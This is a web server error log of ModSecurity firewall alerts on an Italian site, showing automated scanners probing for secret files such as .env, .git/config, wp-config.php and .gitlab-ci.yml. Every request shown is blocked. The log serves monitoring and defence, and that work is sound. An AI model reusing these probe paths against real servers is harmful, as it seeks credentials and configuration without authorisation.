[Sat Dec 06 09:21:37.715564 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmamwAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.974148 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmanAAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.974525 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmanAAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.974737 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/admin/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmanAAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.209814 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTPnkrsS8kGBs9zQAZmanQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.210141 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTPnkrsS8kGBs9zQAZmanQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.210523 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTPnkrsS8kGBs9zQAZmanQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.210742 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.bak"] [unique_id "aTPnkrsS8kGBs9zQAZmanQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.484025 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/logs/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aTPnkrsS8kGBs9zQAZmangAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.484376 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aTPnkrsS8kGBs9zQAZmangAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.484594 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/logs/HEAD"] [unique_id "aTPnkrsS8kGBs9zQAZmangAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.762629 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aTPnkrsS8kGBs9zQAZmanwAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.762973 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aTPnkrsS8kGBs9zQAZmanwAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.763186 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php"] [unique_id "aTPnkrsS8kGBs9zQAZmanwAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.996905 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase ".gitlab-ci.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .gitlab-ci.yml found within REQUEST_FILENAME: /.gitlab-ci.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aTPnkrsS8kGBs9zQAZmaoAAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.997419 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aTPnkrsS8kGBs9zQAZmaoAAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:38.997709 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.gitlab-ci.yml"] [unique_id "aTPnkrsS8kGBs9zQAZmaoAAAAAE"], referer: https://www.google.com/
[Sat Dec 06 10:20:23.498106 2025] [:error] [pid 551557] [client 85.9.207.35:41596] [client 85.9.207.35] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTP1V7sS8kGBs9zQAZmaqAAAAAE"]
[Sat Dec 06 10:20:23.498403 2025] [:error] [pid 551557] [client 85.9.207.35:41596] [client 85.9.207.35] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTP1V7sS8kGBs9zQAZmaqAAAAAE"]
[Sat Dec 06 10:20:23.498575 2025] [:error] [pid 551557] [client 85.9.207.35:41596] [client 85.9.207.35] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTP1V7sS8kGBs9zQAZmaqAAAAAE"]
[Sat Dec 06 17:16:43.729600 2025] [:error] [pid 562066] [client 45.139.104.184:46798] [client 45.139.104.184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTRW64Su7bPXQ1roYoMn8AAAAAI"]
[Sat Dec 06 17:16:43.730663 2025] [:error] [pid 562066] [client 45.139.104.184:46798] [client 45.139.104.184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTRW64Su7bPXQ1roYoMn8AAAAAI"]
[Sat Dec 06 17:16:43.730847 2025] [:error] [pid 562066] [client 45.139.104.184:46798] [client 45.139.104.184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTRW64Su7bPXQ1roYoMn8AAAAAI"]
[Sun Dec 07 06:03:10.282741 2025] [:error] [pid 575098] [client 185.177.72.8:35548] [client 185.177.72.8] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTUKjsIyjLAtHsCAPK6j2wAAAAg"]
[Sun Dec 07 06:03:10.283020 2025] [:error] [pid 575098] [client 185.177.72.8:35548] [client 185.177.72.8] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTUKjsIyjLAtHsCAPK6j2wAAAAg"]
[Sun Dec 07 06:03:10.283221 2025] [:error] [pid 575098] [client 185.177.72.8:35548] [client 185.177.72.8] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTUKjsIyjLAtHsCAPK6j2wAAAAg"]
[Sun Dec 07 06:14:09.562300 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJrAAAAAk"]
[Sun Dec 07 06:14:09.562590 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJrAAAAAk"]
[Sun Dec 07 06:14:09.562795 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJrAAAAAk"]
[Sun Dec 07 06:14:09.684110 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJrwAAAAk"]
[Sun Dec 07 06:14:09.684421 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJrwAAAAk"]
[Sun Dec 07 06:14:09.684648 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/portal/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJrwAAAAk"]
[Sun Dec 07 06:14:09.708110 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJsAAAAAk"]
[Sun Dec 07 06:14:09.708360 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJsAAAAAk"]
[Sun Dec 07 06:14:09.708638 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJsAAAAAk"]
[Sun Dec 07 06:14:09.730005 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJsQAAAAk"]
[Sun Dec 07 06:14:09.730241 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJsQAAAAk"]
[Sun Dec 07 06:14:09.730488 2025] [:error] [pid 575099] [client 195.178.110.108:49494] [client 195.178.110.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/.env"] [unique_id "aTUNIeplfNiR5IsYA3LJsQAAAAk"]
[Sun Dec 07 06:14:09.753916 2025] [authz_core:error] [pid 575099] [client 195.178.110.108:49494] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Sun Dec 07 06:14:09.877936 2025] [authz_core:error] [pid 573218] [client 195.178.110.108:49506] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Sun Dec 07 06:14:09.924918 2025] [:error] [pid 573218] [client 195.178.110.108:49506] [client 195.178.110.108] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/new/.env"] [unique_id "aTUNIf-86ve6IRoVOdG0QQAAAAA"]
